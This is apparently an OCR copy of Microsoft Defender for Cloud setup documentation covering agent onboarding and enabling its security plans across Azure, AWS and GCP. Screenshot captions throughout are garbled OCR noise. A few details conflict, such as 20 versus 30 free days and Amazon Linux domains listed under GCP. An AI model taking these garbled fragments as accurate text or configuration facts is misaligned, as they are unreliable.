6. (Optional) If you don't already have a Log Analytics workspace in which to store 
the data, select Create new workspace and follow the on-screen guidance. 


7. From the list of workspaces, select Upgrade for the relevant workspace to turn on 
Defender for Cloud paid plans for 30 free days. 


8. From the list of workspaces, select Add Servers for the relevant workspace. 


9. On the Agents management page, choose one of the following procedures, 
depending on the type of machines you're onboarding: 


e Onboard your Windows server 
e Onboard your Linux server 


Onboard your Windows server 


When you add a Windows server, you need to get the information on the Agents 
management page and download the appropriate agent file (32 bit or 64 bit). 


To onboard a Windows server: 


1. Select Windows servers. 


.@ asclab | Agents management 


@ 0 Windows computers connected © 1 Windows computers connected 


via Azure Monitor Windows agent via Log Analytics Windows agent (legacy) 


See them in Logs See them in Logs 


Want to setup the new Azure Monitor agent? Go to ‘Data Collection Rules’ 


Data Collection Rules 


A Log Analytics agent instructions 


Download agent 
Download an agent for your operating system, then install and configure it using the keys for your workspace ID. 
You'll need the Workspace ID and Key to install the agemt 


Download Windows Agent (64 bit) 
Download Windows Agent (32 bin 


Workspace ID 


Primary key 
| Regenerate 
Secondary key 


| Regenerate | 


Log Analytics Gateway 
If you have machines with no internet connectivity to Log Analytics woekspace, download the Log Analytics Gateway to act as a proxy. 


Leam more about Log Analytics Gateway 
Download Lag Analytics Gateway 


. Select the Download Windows Agent link that's applicable to your computer 
processor type to download the setup file. 


. From the Agents management page, copy the Workspace ID and Primary Key 
values into Notepad. 


. Copy the downloaded setup file to the target computer and run it. 
. Follow the installation wizard (select Next > | Agree > Next > Next). 


. On the Azure Log Analytics page, paste the Workspace ID and Primary Key values 
that you copied into Notepad. 


. If the computer should report to a Log Analytics workspace in the Azure 
Government cloud, select Azure US Government from the Azure Cloud dropdown 
list. 


. If the computer needs to communicate through a proxy server to the Log Analytics 
service, select Advanced. Then provide the URL and port number of the proxy 
server. 


9. When you finish entering all of the configuration settings, select Next. 
10. On the Ready to Install page, review the settings to be applied and select Install. 
11. On the Configuration completed successfully page, select Finish. 


When the process is complete, Microsoft Monitoring agent appears in Control Panel. 
You can review your configuration there and verify that the agent is connected. 


For more information on installing and configuring the agent, see Connect Windows 
machines. 


Onboard your Linux server 


To add Linux machines, you need the wget command from the Agents management 


page. 
To onboard your Linux server: 


1. Select Linux servers. 
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© 0 Linux computers connected © 1 Linux computers connected 
via Azure Monitor Linux agent via Log Analytics Linux agent (legacy) 
See them in Logs See them in Logs 


Want to setup the new Azure Monitor agent? Go to ‘Data Collection Rules’ 


Data Collection Rules 


A^ Log Analytics agent instructions 


Download agent 


Download an agent for your operating system, then install and configure it using the keys for your workspace ID. 
You'll need the Workspace ID and Key to install the agent. 


Download Linux Agent 


Download and onboard agent for Linux 


| wget https://raw.githubusercontent.com/Microsoft/OMS-Agent-for-Li ... D 
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2. Copy the wget command into Notepad. Save this file to a location that you can 


access from your Linux computer. 


3. On your Linux computer, open the file that contains the wget command. Copy the 


entire contents and paste them into a terminal console. 


4. When the installation finishes, validate that the Operations Management Suite 
Agent is installed by running the pgrep command. The command returns the 


omsagent persistent ID. 


You can find the logs for the agent at /var/opt/microsoft/omsagent/<workspace 
id>/log/ . The new Linux machine might take up to 30 minutes to appear in 
Defender for Cloud. 


Verify that your machines are connected 
Your Azure and on-premises machines are available to view in one location. 
To verify that your machines are connected: 
1. Sign in to the Azure portal £. 
2. Search for and select Microsoft Defender for Cloud. 
3. On the Defender for Cloud menu, select Inventory to show the asset inventory. 


4. Filter the page to view the relevant resource types. These icons distinguish the 


types: 
d Non-Azure machine 


ZA Azure VM 


& Azure Arc-enabled server 


Clean up resources 


There's no need to clean up any resources for this article. 


Next steps 


e Protect all of your resources with Defender for Cloud. 
e Set up your AWS account and GCP projects. 


Protect your resources with Defender 
CSPM 
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Defender Cloud Security Posture Management (CSPM) in Microsoft Defender for Cloud 
provides you with hardening guidance that helps you efficiently and effectively improve 
your security. CSPM also gives you visibility into your current security situation. 


Defender for Cloud continually assesses your resources, subscriptions, and organization 
for security issues. Defender for Cloud shows you your security posture with the secure 
score. The secure score is an aggregated score of the security findings that tells you 
your current security situation. The higher the score, the lower the identified risk level. 


When you enable Defender for Cloud, you automatically enable the Foundational CSPM 
capabilities. these capabilities are part of the free services offered by Defender for 
Cloud. 


You have the ability to enable the Defender CSPM plan, which offers extra protections 
for your environments such as governance, regulatory compliance, cloud security 


explorer, attack path analysis and agentless scanning for machines. 


O Note 


Agentless scanning requires the Subscription Owner to enable the Defender CSPM 
plan. Anyone with a lower level of authorization can enable the Defender CSPM 
plan, but the agentless scanner won't be enabled by default due a lack of required 
permissions that are only available to the Subscription Owner. In addition, attack 
path analysis and security explorer won't populate with vulnerabilities because the 
agentless scanner is disabled. 


For availability and to learn more about the features offered by each plan, see the 
Defender CSPM plan options. 


You can learn more about Defender CSPM's pricing on the pricing page Z. 


Prerequisites 


e You need a Microsoft Azure subscription. If you don't have an Azure subscription, 
you can sign up for a free subscription”. 


e You must enable Microsoft Defender for Cloud on your Azure subscription. 
e Connect your non-Azure machines, AWS accounts or GCP projects. 


e In order to gain access to all of the features available from the CSPM plan, the plan 
must be enabled by the Subscription Owner. 


Enable the Defender CSPM plan 


When you enable Defender for Cloud, you automatically receive the protections offered 
by the Foundational CSPM capabilities. In order to gain access to the other features 
provided by Defender CSPM, you need to enable the Defender CSPM plan on your 
subscription. 


To enable the Defender CSPM plan on your subscription: 
1. Sign in to the Azure portal £. 
2. Search for and select Microsoft Defender for Cloud. 
3. In the Defender for Cloud menu, select Environment settings. 
4. Select the relevant Azure subscription, AWS account or GCP project. 
5. On the Defender plans page, toggle the Defender CSPM plan to On. 


6. Select Save. 


Enable the components of the Defender CSPM 
plan 


Once the Defender CSPM plan is enabled on your subscription, you have the ability to 
enable the individual components of the Defender CSPM plan: 


e Agentless scanning for machines: Scans your machines for installed software and 
vulnerabilities without relying on agents or impacting machine performance. You 


can disable the agentless scanner or add exclusion tags to your subscription. 


e Agentless discovery for Kubernetes: API-based discovery of information about 
Kubernetes cluster architecture, workload objects, and setup. Required for 
Kubernetes inventory, identity and network exposure detection, risk hunting as 
part of the cloud security explorer. This extension is required for attack path 
analysis (DCSPM only). 


e Container registries vulnerability assessments: Provides vulnerability management 
for images stored in your container registries. 


e Sensitive data discovery: Sensitive data discovery automatically discovers 
managed cloud data resources containing sensitive data at scale. This feature 
accesses your data, it is agentless, uses smart sampling scanning, and integrates 
with Microsoft Purview sensitive information types and labels. 


To enable the components of the Defender CSPM plan: 


1. On the Defender plans page, select Settings. 
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tures will be enabled on all the resource types you've selected. The first 30 days are free. 


2. Select On for each component to enable it. 


3. (Optional) For agentless scanning for machine select Edit configuration. 


Settings & monitoring 
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a. Enter a tag name and tag value for any machines to be excluded from scans. 
b. Select Apply. 


4. Select Continue. 


Next steps 


Cloud Security Posture Management (CSPM) 


Protect your servers with Defender for 
Servers 
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Defender for Servers in Microsoft Defender for Cloud brings threat detection and 
advanced defenses to your Windows and Linux machines that run in Azure, Amazon 
Web Services (AWS), Google Cloud Platform (GCP), and on-premises environments. This 
plan includes the integrated license for Microsoft Defender for Endpoint, security 
baselines and OS level assessments, vulnerability assessment scanning, adaptive 
application controls (AAC), file integrity monitoring (FIM), and more. 


Microsoft Defender for Servers includes an automatic, native integration with Microsoft 
Defender for Endpoint. Learn more, Protect your endpoints with Defender for Cloud's 
integrated EDR solution: Microsoft Defender for Endpoint. With this integration enabled, 
you have access to the vulnerability findings from Microsoft threat and vulnerability 


management. 


Defender for Servers offers two plan options with different levels of protection and their 
own cost. You can learn more about Defender for Cloud's pricing on the pricing page”. 


Prerequisites 


e You need a Microsoft Azure subscription. If you don't have an Azure subscription, 


you can sign up for a free subscription”. 
e You must enable Microsoft Defender for Cloud on your Azure subscription. 


e Review the Defender for Servers deployment guide. 


Enable the Defender for Servers plan 


You can enable the Defender for Servers plan from the Environment settings page to 
protect all the machines in an Azure subscription, AWS account, or GCP project. 


To enable the Defender for Servers plan: 
1. Sign in to the Azure portal £. 
2. Search for and select Microsoft Defender for Cloud. 


3. In the Defender for Cloud menu, select Environment settings. 


4. Select the relevant subscription. 


5. On the Defender plans page, toggle the Servers switch to On. 


B ws 3 1 Azure API Management services Con 


you select Save, Microsoft Defender for Cloud's e 


A atures will be enabled on all the resource types youve selected. The first 30 days are free. 
For more information on Defender for Cloud pricing, visit the 


Select a Defender for Servers plan 


When you enable the Defender for Servers plan, you're then given the option to select 
which plan - Plan 1 or Plan 2 - to enable. There are two plans you can choose from that 
offer different levels of protections for your resources. 


Review what's included each plan. 
To select a Defender for Servers plan: 
1. Sign in to the Azure portal Z. 
2. Search for and select Microsoft Defender for Cloud. 
3. In the Defender for Cloud menu, select Environment settings. 
4. Select the relevant Azure subscription, AWS account, or GCP project. 


5. Select Change plans. 


Home > Microsoft Defender for Cloud | Environment settings 
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When you select Save, Microsoft Defender for Cloud's enhanced security features will be enabled on all the resource types you've selected. The first 20 days are free. 
For more information on Defender for Cloud pricing, visit the pricing page. 


6. In the popup window, select Plan 2 or Plan 1. 
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Defender for servers is offered in two plans. 

Plan 1 provides a limited set of defenses with a focus on Defender for Endpoint's 
protections. 

Plan 2 (formerly “Defender for servers") offers the full set of Defender for Cloud's 
enhanced security features. 

Learn more 


(©) Microsoft Defender for Servers Plan 2 /Server/Month 
^ Plan details “Recommended | 


© Agentless vulnerability scanning 

© Microsoft Defender for Endpoint 

© Microsoft Defender vulnerability management 

© Automatic agent onboarding, alert and data integration 
© Just-in-time VM access for management ports 

© Network layer threat detection 

© Adaptive application controls 

@ File integrity monitoring 

© Adaptive network hardening 

@ Integrated vulnerability assessment powered by Qualys 


© Log Analytics 500MB free data ingestion 


O Microsoft Defender for Servers Plan 1 /Server/Month 


Plan details 


7. Select Confirm. 


8. Select Save. 


Configure monitoring coverage 


There are three components that can be enabled and configured to provide extra 
protections to your environments in the Defender for Servers plans. 


Component Description Learn more 


Log Analytics Collects security-related configurations and Learn more about the 
agent/Azure event logs from the machine and stores the data Log Analytics agent. 
Monitor agent in your Log Analytics workspace for analysis. 

Vulnerability Enables vulnerability assessment on your Azure Learn more about how 
assessment for and hybrid machines. Defender for Cloud 
machines collects data. 

Agentless scanning Scans your machines for installed software and Learn more about 
for machines vulnerabilities without relying on agents or agentless scanning for 
impacting machine performance. machines. 


Toggle the corresponding switch to On, to enable any of these options. 


Configure Log Analytics agent/Azure Monitor agent 


After enabling the Log Analytics agent/Azure Monitor agent, you'll be presented with 
the option to select either the Log Analytics agent or the Azure Monitor agent and 
which workspace should be utilized. 


To configure the Log Analytics agent/Azure Monitor agent: 


1. Select Edit configuration. 
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‘Vulnerability assessment for machines Enables vulnerability assessment on your Azure and hybrid machines. Learn more 


‘Agentless scanning for machines (preview) ‘Scans your machines for installed software and vulnerabilities without relying on agents or impacting machine performance. Learn more 


2. In the Auto provisioning configuration window, select one of the following two 
agent types: 


e Log Analytic Agent (Default) - Collects security-related configurations and 
event logs from the machine and stores the data in your Log Analytics 
workspace for analysis. 


e Azure Monitor Agent (Preview) - Collects security-related configurations and 
event logs from the machine and stores the data in your Log Analytics 
workspace for analysis. 


Auto-provisioning configuration x 


Log analytics agent 


Agent type 


@) Log Analytics Agent (Default) 
Collects security-related configurations and event logs from the machine and stores 
the data in your Log Analytics workspace for analysis 


O Azure Monitor Agent (Preview) 
Collects security-related configurations and event logs from the machine and stores 
the data in your Log Analytics workspace for analysis 

Workspace selection * © 


O Default workspace(s) 


(@) Custom workspace Select a workspace V 


(i) When selecting a custom workspace, make sure the relevant solutions are enabled on it. 
Learn more > 


Security events storage ê © 


| All Events 


OO If a VM already has either SCOM or OMS agent installed locally, the Log Analytics agent extension 
will still be installed and connected to the configured workspace. 
Any other solutions enabled on the selected workspace will be applied to Azure VMs that are 
connected to it. For paid solutions, this could result in additional charges. 
For data privacy considerations, please make sure your selected workspace is in your desired 
region. 


Apply 


3. Select either a Default workspace(s) or a Custom workspace depending on your 
need. 


4. Select Apply. 


Configure vulnerability assessment for machines 


Vulnerability assessment for machines allows you to select between two vulnerability 
assessment solutions: 


e Microsoft Defender vulnerability management 
e Microsoft Defender for Cloud integrated Qualys scanner 


To select either of the vulnerability assessment solutions: 


1. Select Edit configuration. 


P Search resources, services, and docs (G+/) 


When you enable an extension, it will be installed on any new or existing resource, by assigning a security policy. 
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2. In the Extension deployment configuration window, select either of the solutions 
depending on your need. 


3. Select Apply. 


Configure agentless scanning for machines (preview) 


Defender for Cloud has the ability to scan your Azure machines for installed software 
and vulnerabilities without requiring you to install agents, have network connectivity or 
affect your machine's performance. 


To configure agentless scanning for machines: 


1. Select Edit configuration. 
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2. Enter a tag name and tag value for any machines to be excluded from scans. 


3. Select Apply. 


Next steps 


Overview of Microsoft Defender for Servers 


Protect your applications with Defender 
for App Service 
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Azure App Service is a fully managed platform for building and hosting your web apps 
and APIs. It provides management, monitoring, and operational insights to meet 
enterprise-grade performance, security, and compliance requirements. For more 


information, see Azure App Service”. 


Microsoft Defender for App Service uses the scale of the cloud to identify attacks 
targeting applications running over App Service. Attackers probe web applications to 
find and exploit weaknesses. Before being routed to specific environments, requests to 
applications running in Azure go through several gateways, where they're inspected and 
logged. The data is then used to identify exploits and attackers, and to learn new 
patterns that are used later. 


When you enable Microsoft Defender for App Service, you immediately benefit from the 
following services offered by this Defender plan: 


e Secure - Defender for App Service assesses the resources covered by your App 
Service plan and generates security recommendations based on its findings. Use 
the detailed instructions in these recommendations to harden your App Service 


resources. 


e Detect - Defender for App Service detects a multitude of threats to your App 

Service resources by monitoring: 

o the VM instance in which your App Service is running, and its management 
interface 

o the requests and responses sent to and from your App Service apps 

o the underlying sandboxes and VMs 

o App Service internal logs - available thanks to the visibility that Azure has as a 
cloud provider 


As a cloud-native solution, Defender for App Service can identify attack methodologies 
applying to multiple targets. For example, from a single host it would be difficult to 
identify a distributed attack from a small subset of IPs, crawling to similar endpoints on 
multiple hosts. 


The log data and the infrastructure together can tell the story: from a new attack 


circulating in, the wild to compromises in customer machines. Therefore, even if 


Microsoft Defender for App Service is deployed after a web app has been exploited, it 
might be able to detect ongoing attacks. 


You can learn more about Defender for Clouds pricing on the pricing page”. 


Prerequisites 


e You need a Microsoft Azure subscription. If you don't have an Azure subscription, 


you can sign up for a free subscription”. 
e You must enable Microsoft Defender for Cloud on your Azure subscription. 


e You must have a supported App Service plan associated with dedicated machines. 


See the list of supported plans. 


Enable the Defender for App Service plan 


When you enable Defender for Cloud, you have the ability to add the Defender for App 
Service plan to your subscription to manage, monitor and gain operational insights to 
meet enterprise-grade performance, security, and compliance requirements for your 


machines. 
To enable Defender for App Service on your subscription: 
1. Sign in to the Azure portal £. 
2. Search for and select Microsoft Defender for Cloud. 
3. In the Defender for Cloud menu, select Environment settings. 
4. Select the relevant subscription. 


5. On the Defender plans page, toggle the App Service plan to On. 
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When you select Save, Microsoft Defender for Cloud's enhanced security features will be enabled on all the resource types you've selected. The first 30 days are free: 
For more information on Defender for Cloud pricing, visit the pricing page. 


6. Select Save. 


Next steps 


Overview of Defender for App Service to protect your Azure App Service web apps and 
APIs 


Protect your databases with Defender 
for Databases 
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Defender for Databases in Microsoft Defender for Cloud allows you to protect your 
entire database estate with attack detection and threat response for the most popular 
database types in Azure. Defender for Cloud provides protection for the database 
engines and for data types, according to their attack surface and security risks. 


Database protection includes: 


e Microsoft Defender for Azure SQL databases 

e Microsoft Defender for SQL servers on machines 

e Microsoft Defender for open-source relational databases 
e Microsoft Defender for Azure Cosmos DB 


These four database protection plans are priced separately. Get more info about 
Defender for Cloud's pricing on the pricing page”. 


Prerequisites 


e You need a Microsoft Azure subscription. If you don't have an Azure subscription, 
you can sign up for a free subscription”. 


e You must enable Microsoft Defender for Cloud on your Azure subscription. 


e Connect your non-Azure machines, AWS account or GCP projects. 


Enable the Databases plan 


When you enable database protection, you enable all four of the Defender plans and 
protect all of the supported databases on your subscription. 


To enable Defender for Databases on your subscription: 
1. Sign in to the Azure portal £. 
2. Search for and select Microsoft Defender for Cloud. 
3. In the Defender for Cloud menu, select Environment settings. 


4. Select the relevant Azure subscription, AWS account or GCP project. 


5. On the Defender plans page, toggle the Databases plan to On. 
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Enable specific plans database protections 


When you enable database protection, you enable the following four Defender plans: 


e Defender for Azure SQL databases 

e Defender for SQL server on machines 

e Defender for open-source relational databases 
e Defender for Azure Cosmos DB 


These plans protect all of the supported databases in your subscription. 
To enable specific database protections on your subscription: 

1. Sign in to the Azure portal £. 

2. Search for and select Microsoft Defender for Cloud. 

3. In the Defender for Cloud menu, select Environment settings. 

4. Select the relevant subscription. 


5. On the Defender plans page, locate the Databases plan and select Select types. 


Home > Microsoft Defender for Cloud | Environment settings 
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P Search E save settings & monitoring 
ZO 


Enable all plans 


Defender plans 


O tionn A Cloud Security Posture Management (CSPM) 


3 rum automation 
Microsoft Defender CSM prov 


s including agentes uren 


ning the cloud pr and advanced threat hunting. Pricing is basse en subscription se, with biling applying orly fer Servers, Databases, andi Storage resources at nr rraren 


advanced security posture capabi 


PEON Foundations CSP includes aset covery continuous assessment and Securty recommendations Tor posture hardening and a Secure score rae paz Of your zeraren posture: 
Policy settings pan Pricing Resource quantity Monitoring coverage status 
€ perra 

D Foundations! csom Sr Can on) 
© Governance rules 

© beza EEEren resources © 

A Cloud Workload Protection (CWP) 

Microsoft Defender for Cloud provides comprehensive; cout -ative protections fom development to runtime in muhi-cloud envionment, 

an Pricing Resource quantity Monitoring coverage sans 

B e akatzen ere o o 

E app senice piat o ge 

E pro Protected: oo instances oe 

= Sarr rren : 

E storage Serra malware repre? storage accounts o D 

eei 
fp containers deie puro registries: 0 kubemetes cores n E 
Gera EEE Okey ute TZ SEE, 


A 
Details > 


©» esio o E 


[6] Resource Manager 


Se ban? 1 dame AP Management ice a SE 


When you select Save, Micrasoft Defender for Cloud's enhanced security features will be enabled on all the resource types you've selected. The first 30 days are free. 
For more information on Defender for Cloud pricing, visit the pricing page. 


6. In the Resource types selection window, toggle the desired plans to On or Off. 


Resource types selection x 


Defender for cloud offers protection for a variety of database resource types, both SQL 
servers and managed cloud database services. Learn more 
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7. (Optional) Exclude specific database resource types by toggling them to Off. 
8. Select Continue. 


9. Select Save. 


Next steps 


Overview of Microsoft Defender for Azure SQL 


Microsoft Defender for SQL servers on machines 


Overview of Microsoft Defender for open-source relational databases 


Overview of Microsoft Defender for Azure Cosmos DB 


Deploy Microsoft Defender for Storage 
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Microsoft Defender for Storage is an Azure-native solution offering an advanced layer of 
intelligence for threat detection and mitigation in storage accounts, powered by 
Microsoft Threat Intelligence“, Microsoft Defender Antimalware technologies, and 
Sensitive Data Discovery. With protection for Azure Blob Storage, Azure Files, and Azure 
Data Lake Storage services, it provides a comprehensive alert suite, near real-time 
Malware Scanning (add-on), and sensitive data threat detection (no extra cost), allowing 
quick detection, triage, and response to potential security threats with contextual 
information. It helps prevent the three major impacts on your data and workload: 
malicious file uploads, sensitive data exfiltration, and data corruption. 


With Microsoft Defender for Storage, organizations can customize their protection and 
enforce consistent security policies by enabling it on subscriptions and storage accounts 
with granular control and flexibility. 


Q Tip 


If you're currently using Microsoft Defender for Storage classic, consider migrating 
to the new plan, which offers several benefits over the classic plan. 


Availability 


Aspect Details 

Release state: General Availability (GA) 

Feature - Activity monitoring (security alerts) - General Availability (GA) 
availability: - Malware Scanning — General Availability (GA) 


- Sensitive data threat detection (Sensitive Data Discovery) — Preview 


Visit the pricing page Z to learn more. 


Required roles For Malware Scanning and sensitive data threat detection at subscription and 

and storage account levels, you need Owner roles (subscription owner/storage 

permissions: account owner) or specific roles with corresponding data actions. To enable 
Activity Monitoring, you need ‘Security Admin’ permissions. Read more about 
the required permissions. 


Clouds: @ Azure Commercial clouds* 
* Azure Government (only activity monitoring support on the classic plan) 


Aspect Details 


X Azure China 21Vianet 
* Connected AWS accounts 


*Azure DNS Zone is not supported for Malware Scanning and sensitive data threat 
detection. 


Prerequisites for Malware scanning 


To enable and configure Malware Scanning, you must have Owner roles (such as 
Subscription Owner or Storage Account Owner) or specific roles with the necessary data 
actions. Learn more about the required permissions. 


Set up and configure Microsoft Defender for 
Storage 


To enable and configure Microsoft Defender for Storage and ensure maximum 
protection and cost optimization, the following configuration options are available: 


e Enable/disable Microsoft Defender for Storage at the subscription and storage 
account levels. 

e Enable/disable the Malware Scanning or sensitive data threat detection 
configurable features. 

e Seta monthly cap ("capping") on the Malware Scanning per storage account per 
month to control costs (default value is 5,000GB). 

e Configure methods to set up response to malware scanning results. 

e Configure methods for saving malware scanning results logging. 


Q Tip 


The Malware Scanning feature has advanced configurations to help security teams 
support different workflows and requirements. 


e Override subscription-level settings to configure specific storage accounts with 
custom configurations that differ from the settings configured at the subscription 


level. 


There are several ways to enable and configure Defender for Storage: using the Azure 
built-in policy (the recommended method), programmatically using Infrastructure as 


Code templates, including Terraform, Bicep, and ARM templates, using the Azure portal, 
or directly with the REST API. 


Enabling Defender for Storage via a policy is recommended because it facilitates 
enablement at scale and ensures that a consistent security policy is applied across all 
existing and future storage accounts within the defined scope (such as entire 
management groups). This keeps the storage accounts protected with Defender for 
Storage according to the organization's defined configuration. 


O Note 


To prevent migrating back to the legacy classic plan, make sure to disable the old 
Defender for Storage policies. Look for and disable policies named configure Azure 
Defender for Storage to be enabled, Azure Defender for Storage should be 
enabled, or Configure Microsoft Defender for Storage to be enabled (per-storage 


account plan) or deny policies that prevent the disablement of the classic plan. 


Next steps 


e Learn how to enable and Configure the Defender for Storage plan at scale with an 
Azure built-in policy. 


Protect your Azure containers with 
Defender for Containers 
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Defender for Containers in Microsoft Defender for Cloud is the cloud-native solution 
that is used to secure your containers so you can improve, monitor, and maintain the 


security of your clusters, containers, and their applications. 
Learn more about Overview of Microsoft Defender for Containers. 


You can learn more about Defender for Container's pricing on the pricing page”. 


Prerequisites 


e You need a Microsoft Azure subscription. If you don't have an Azure subscription, 


you can sign up for a free subscription”. 
e You must enable Microsoft Defender for Cloud on your Azure subscription. 


e Ensure the required Fully Qualified Domain Names (FQDN)/application endpoints 
are configured for outbound access so the Defender agent can connect to 
Microsoft Defender for Cloud to send security data and events. 


O Note 


By default, AKS clusters have unrestricted outbound (egress) internet access. 


Enable the Defender for Containers plan 


By default, when enabling the plan through the Azure portal, Microsoft Defender for 
Containers is configured to automatically install required components to provide the 
protections offered by plan, including the assignment of a default workspace. 


If you would prefer to assign a custom workspace, one can be assigned through the 


Azure Policy. 
To enable Defender for Containers plan on your subscription: 
1. Sign in to the Azure portal £. 


2. Search for and select Microsoft Defender for Cloud. 


3. In the Defender for Cloud menu, select Environment settings. 
4. Select the relevant Azure subscription. 


5. On the Defender plans page, toggle the Containers plan to On. 
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6. Select Save. 


Deploy the Defender agent in Azure 


O Note 


To enable or disable individual Defender for Containers capabilities, either globally 
or for specific resources, see How to enable Microsoft Defender for Containers 
components. 


You can enable the Defender for Containers plan and deploy all of the relevant 
components in different ways. We walk you through the steps to accomplish this using 
the Azure portal. Learn how to deploy the Defender agent with REST API, Azure CLI or 
with a Resource Manager template. 


To deploy the Defender agent in Azure: 
1. Sign in to the Azure portal Z. 
2. Search for and select Microsoft Defender for Cloud. 
3. Navigate to the Recommendations page. 


4. Search for and select the Azure Kubernetes Service clusters should have Defender 


profile enabled recommendation. 
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5. Select all of the relevant affected resources. 


6. Select Fix. 
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e For advanced enablement features for Defender for Containers, see the Enable 


Microsoft Defender for Containers page. 


e Overview of Microsoft Defender for Containers. 


Protect your on-premises Kubernetes 
clusters with Defender for Containers 
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Defender for Containers in Microsoft Defender for Cloud is the cloud-native solution 
that is used to secure your containers so you can improve, monitor, and maintain the 
security of your clusters, containers, and their applications. 


Learn more about Overview of Microsoft Defender for Containers. 


You can learn more about Defender for Container's pricing on the pricing page”. 


Prerequisites 


e You need a Microsoft Azure subscription. If you don't have an Azure subscription, 


you can sign up for a free subscription”. 
e You must enable Microsoft Defender for Cloud on your Azure subscription. 


e Ensure the following Azure Arc-enabled Kubernetes network requirements are 
validated and connect the Kubernetes cluster to Azure Arc. 


e Validate the following endpoints are configured for outbound access so that the 
Defender agent can connect to Microsoft Defender for Cloud to send security data 


and events: 
Domain Port 
* ods.opinsights.azure.com 443 
*oms.opinsights.azure.com 443 
login.microsoftonline.com 443 


e Connect the Kubernetes cluster to Azure Arc 


Enable the Defender for Containers plan 


By default, when enabling the plan through the Azure portal, Microsoft Defender for 
Containers is configured to automatically install required components to provide the 
protections offered by plan, including the assignment of a default workspace. 


If you would prefer to assign a custom workspace, one can be assigned through the 
Azure Policy. 


To enable Defender for Containers plan on your subscription: 
1. Sign in to the Azure portal £. 
2. Search for and select Microsoft Defender for Cloud. 
3. In the Defender for Cloud menu, select Environment settings. 
4. Select the relevant subscription. 


5. On the Defender plans page, toggle the Containers plan to On. 
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6. Select Save. 


O Note 


To enable or disable individual Defender for Containers capabilities, either globally 
or for specific resources, see How to enable Microsoft Defender for Containers 
components. 


Deploy the Defender agent on Arc-enabled 
Kubernetes clusters 


You can enable the Defender for Containers plan and deploy all of the relevant 
components in different ways. We walk you through the steps to accomplish this using 
the Azure portal. Learn how to deploy the Defender agent with REST API, Azure CLI or 
with a Resource Manager template. 


To deploy the Defender agent in Azure: 
1. Sign in to the Azure portal £. 
2. Search for and select Microsoft Defender for Cloud. 


3. Navigate to the Recommendations page. 


4. Search for and select the Azure Arc-enabled Kubernetes clusters should have the 


Defender extension installed recommendation. 
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5. Select all of the relevant affected resources. 


6. Select Fix. 


Next steps 
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e For advanced enablement features for Defender for Containers, see the Enable 


Microsoft Defender for Containers page. 


e Overview of Microsoft Defender for Containers. 


Protect your Amazon Web Service 
(AWS) containers with Defender for 
Containers 


Article e 08/13/2023 


Defender for Containers in Microsoft Defender for Cloud is the cloud-native solution 
that is used to secure your containers so you can improve, monitor, and maintain the 
security of your clusters, containers, and their applications. 


Learn more about Overview of Microsoft Defender for Containers. 


You can learn more about Defender for Container's pricing on the pricing page”. 


Prerequisites 


e You need a Microsoft Azure subscription. If you don't have an Azure subscription, 


you can sign up for a free subscription”. 
e You must enable Microsoft Defender for Cloud on your Azure subscription. 
e Connect your AWS account to Microsoft Defender for Cloud 


e Validate the following domains only if you're using a relevant OS. 


Domain Port Host operating systems 
amazonlinux.*.amazonaws.com/2/extras/* 443 Amazon Linux 2 

yum default repositories - RHEL / Centos 

apt default repositories - Debian 


e Ensure the following Azure Arc-enabled Kubernetes network requirements are 


validated. 


Enable the Defender for Containers plan on 
your AWS account 


To protect your EKS clusters, you need to enable the Containers plan on the relevant 


AWS account connector. 


To enable the Defender for Containers plan on your AWS account: 
1. Sign in to the Azure portal £. 
2. Search for and select Microsoft Defender for Cloud. 
3. In the Defender for Cloud menu, select Environment settings. 


4. Select the relevant AWS account. 


ili Microsoft Defender for Cloud | Environment settings 
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6. (Optional) To change the retention period for your audit logs, select Settings, enter 
the required time frame, and select Save. 
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Details > 


O Note 


If you disable this configuration, then the Threat detection (control plane) 


feature will be disabled. Learn more about features availability. 


7. Select Next: Review and generate. 


8. Select Update. 


O Note 


To enable or disable individual Defender for Containers capabilities, either globally 
or for specific resources, see How to enable Microsoft Defender for Containers 
components. 


Deploy the Defender agent in EKS clusters 


Azure Arc-enabled Kubernetes, the Defender agent, and Azure Policy for Kubernetes 
should be installed and running on your EKS clusters. There's a dedicated Defender for 
Cloud recommendation that can be used to install these extensions (and Azure Arc if 


necessary): 


e EKS clusters should have Microsoft Defender's extension for Azure Arc 


installed 


To deploy the required extensions: 


1. From Defender for Cloud's Recommendations page, search for one of the 


recommendations by name. 


2. Select an unhealthy cluster. 


© Important 
You must select the clusters one at a time. 
Don't select the clusters by their hyperlinked names: select anywhere else in 
the relevant row. 
3. Select Fix. 
4. Defender for Cloud generates a script in the language of your choice: 


e For Linux, select Bash. 


e For Windows, select PowerShell. 
5. Select Download remediation logic. 


6. Run the generated script on your cluster. 


Dashboard > Microsoft Defender for Cloud 


EKS clusters should have Azure Defender's extension for Azure Arc installed 


KA Open query 


Severity Freshness interval 
| High ®© 6 Hours @ 


Select the row; not the resource's name 


^ Affected resources 


Unhealthy resources (7) Healthy resources (4) Not applicable resources (0) 


| Ø Search AWS resources 


Name T4 AWS Account Connector name Region Resource type Subscription 
(@ policy-addon-cluster-us-w 102614528198 securityConnector us-west-2 AWS EKS Cluster ASC DEMO 
Fix Trigger logic app 


Was this recommendation useful? © Yes O No 


Next steps 


e For advanced enablement features for Defender for Containers, see the Enable 
Microsoft Defender for Containers page. 


e Overview of Microsoft Defender for Containers. 


Protect your Google Cloud Platform 
(GCP) containers with Defender for 
Containers 
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Defender for Containers in Microsoft Defender for Cloud is the cloud-native solution 
that is used to secure your containers so you can improve, monitor, and maintain the 
security of your clusters, containers, and their applications. 


Learn more about Overview of Microsoft Defender for Containers. 


You can learn more about Defender for Container's pricing on the pricing page”. 


Prerequisites 


e You need a Microsoft Azure subscription. If you don't have an Azure subscription, 


you can sign up for a free subscription”. 
e You must enable Microsoft Defender for Cloud on your Azure subscription. 
e Connect your GCP projects to Microsoft Defender for Cloud. 


e Validate the following domains only if you're using a relevant OS. 


Domain Port Host operating systems 
amazonlinux.*.amazonaws.com/2/extras/* 443 Amazon Linux 2 

yum default repositories - RHEL / Centos 

apt default repositories - Debian 


e Ensure the following Azure Arc-enabled Kubernetes network requirements are 


validated. 


Enable the Defender for Containers plan on 
your GCP project 


To protect Google Kubernetes Engine (GKE) clusters: 


1. Sign in to the Azure portal Z. 


2. Search for and select Microsoft Defender for Cloud. 


3. In the Defender for Cloud menu, select Environment settings. 


4. Select the relevant GCP project. 
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5. Select the Next: Select plans button. 


6. Ensure that the Containers plan is toggled to On. 


@ Containers 


7. Select the Copy button. 


Partially configured: 2 / 3 N 
Provides real-time threat protection for your GKE clusters and generates alerts for suspicious activities. Defender for Cloud will get dera a d O 
